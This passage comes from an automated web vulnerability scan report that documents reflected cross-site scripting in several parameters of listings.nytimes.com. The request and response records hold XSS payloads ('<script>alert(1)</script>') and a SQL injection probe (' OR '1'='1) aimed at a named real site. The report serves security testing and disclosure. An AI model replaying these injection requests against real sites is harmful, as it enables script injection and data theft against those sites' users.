Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIds8 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72117"><script>alert(1)</script>5eda678c2511f3f5d was submitted in the sLsIds8 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-57035972117"><script>alert(1)</script>5eda678c2511f3f5d&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91506
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSABRQSAS=JHLKNADAHNGIIIBFAOJLIHJE; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIds8" value="125-514452,125-541145,125-416753,125-444446,125-537604,125-502641,125-567841,125-564153,20-1000290506_030,125-57035972117"><script>alert(1)</script>5eda678c2511f3f5d">
...[SNIP]...

4.264. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIds9 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIds9 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed3e1"><script>alert(1)</script>c873639b5b164cc51 was submitted in the sLsIds9 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112ed3e1"><script>alert(1)</script>c873639b5b164cc51&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91480
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCDTSTDT=MJOLPOGAIOHNHBFNOJJMOPMK; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIds9" value="125-539476,125-431610,125-442946,125-560310,125-497124,125-529949,125-568533,125-558371,125-553006,125-553112ed3e1"><script>alert(1)</script>c873639b5b164cc51">
...[SNIP]...

4.265. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIds9 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIds9 request parameter is copied into the HTML document as plain text between tags. The payload d3a39<script>alert(1)</script>9cd5fe08e2c was submitted in the sLsIds9 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
02641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112d3a39<script>alert(1)</script>9cd5fe08e2c&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c12
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:30:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112d3a39<script>alert(1)</script>9cd5fe08e2c&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125
...[SNIP]...

4.266. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsA parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsA request parameter is copied into the HTML document as plain text between tags. The payload aafbc<script>alert(1)</script>98e65451409 was submitted in the sLsIdsA parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983aafbc<script>alert(1)</script>98e65451409&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c1
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:31:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983aafbc<script>alert(1)</script>98e65451409&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c12
...[SNIP]...

4.267. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsA parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsA request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec84d"><script>alert(1)</script>800b6613f6fe0038c was submitted in the sLsIdsA parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983ec84d"><script>alert(1)</script>800b6613f6fe0038c&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%